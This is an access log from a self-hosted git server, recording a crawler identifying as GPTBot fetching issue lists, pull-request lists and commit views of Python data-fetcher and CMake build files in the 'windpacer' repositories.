"https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:10:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:10:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:18:10:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:18:10:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:18:10:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:18:10:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:18:10:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:18:10:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/api_fetcher.py?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/api_fetcher.py" +[17/Feb/2026:18:10:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10984] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:18:10:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10981] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:18:10:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/investing_fetcher.py?display=source" [Client 74.7.227.38] [Length 13079] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/investing_fetcher.py" +[17/Feb/2026:18:10:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/usdkrw_fetcher.py?display=source" [Client 74.7.227.38] [Length 12475] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/usdkrw_fetcher.py" +[17/Feb/2026:18:10:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10981] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:18:10:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/usdkrw_fetcher.py?display=source" [Client 74.7.227.38] [Length 12505] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/usdkrw_fetcher.py" +[17/Feb/2026:18:10:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/usdkrw_fetcher.py?display=rendered" [Client 74.7.227.38] [Length 10950] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/usdkrw_fetcher.py" +[17/Feb/2026:18:10:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/api_fetcher.py?display=rendered" [Client 74.7.227.38] [Length 10946] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/api_fetcher.py" +[17/Feb/2026:18:10:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/investing_fetcher.py?display=source" [Client 74.7.227.38] [Length 13045] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/investing_fetcher.py" +[17/Feb/2026:18:10:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10979] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:18:10:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10981] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:18:10:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/usdkrw_fetcher.py?display=rendered" [Client 74.7.227.38] [Length 10920] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/usdkrw_fetcher.py" +[17/Feb/2026:18:10:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10981] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:18:10:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11102] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:18:10:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11085] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:10:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11100] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:18:10:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:10:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11324] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:18:10:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:10:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11234] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:18:10:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11085] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:18:10:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:18:10:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11235] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:18:10:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11206] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:10:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 24300] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:18:10:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11621] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:18:10:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:10:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11326] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:18:10:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11122] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:18:10:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11504] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:10:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11325] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:18:10:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:10:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11085] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:18:10:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11236] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:18:10:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=source" [Client 74.7.227.38] [Length 15281] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:10:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:18:10:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11188] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:18:10:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11099] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:18:10:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:10:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=source" [Client 74.7.227.38] [Length 15276] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:10:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr 